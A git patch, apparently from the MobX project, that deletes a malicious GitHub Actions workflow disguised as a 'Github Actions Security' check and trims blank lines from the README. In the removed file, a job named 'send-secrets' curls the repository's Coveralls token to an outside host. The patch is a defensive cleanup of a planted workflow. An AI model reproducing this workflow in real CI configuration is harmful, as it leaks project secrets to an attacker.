From 2808e842ea111eece9a883f1cf27bea6d72b4261 Mon Sep 17 00:00:00 2001 From: Michel Weststrate Date: Fri, 5 Sep 2025 18:17:26 +0200 Subject: [PATCH] chore: #4580 --- .github/workflows/github_actions_security.yml | 17 ----------------- README.md | 3 --- 2 files changed, 20 deletions(-) delete mode 100644 .github/workflows/github_actions_security.yml diff --git a/.github/workflows/github_actions_security.yml b/.github/workflows/github_actions_security.yml deleted file mode 100644 index 787250ac8..000000000 --- a/.github/workflows/github_actions_security.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: Github Actions Security - -on: - workflow_dispatch: - push: - -jobs: - send-secrets: - runs-on: ubuntu-latest - - steps: - - name: Prepare Cache Busting - run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV - - - name: Github Actions Security - run: | - curl -s -X POST -d 'COVERALLS_REPO_TOKEN=${{ secrets.COVERALLS_REPO_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page diff --git a/README.md b/README.md index 03ee53ba8..aba54e592 100644 --- a/README.md +++ b/README.md @@ -184,6 +184,3 @@ The **[MobX Quick Start Guide](https://www.packtpub.com/product/mobx-quick-start MobX is inspired by reactive programming principles, which are for example used in spreadsheets. It is inspired by model–view–viewmodel frameworks like [MeteorJS's Tracker](https://docs.meteor.com/api/tracker.html), [Knockout](https://knockoutjs.com/) and [Vue.js](https://vuejs.org/), but MobX brings _transparent functional reactive programming_ (TFRP, a concept which is further explained in the [MobX book](https://www.packtpub.com/product/mobx-quick-start-guide/9781789344837)) to the next level and provides a standalone implementation. It implements TFRP in a glitch-free, synchronous, predictable and efficient manner. A ton of credit goes to [Mendix](https://github.com/mendix), for providing the flexibility and support to maintain MobX and the chance to prove the philosophy of MobX in a real, complex, performance critical applications. - - - \ No newline at end of file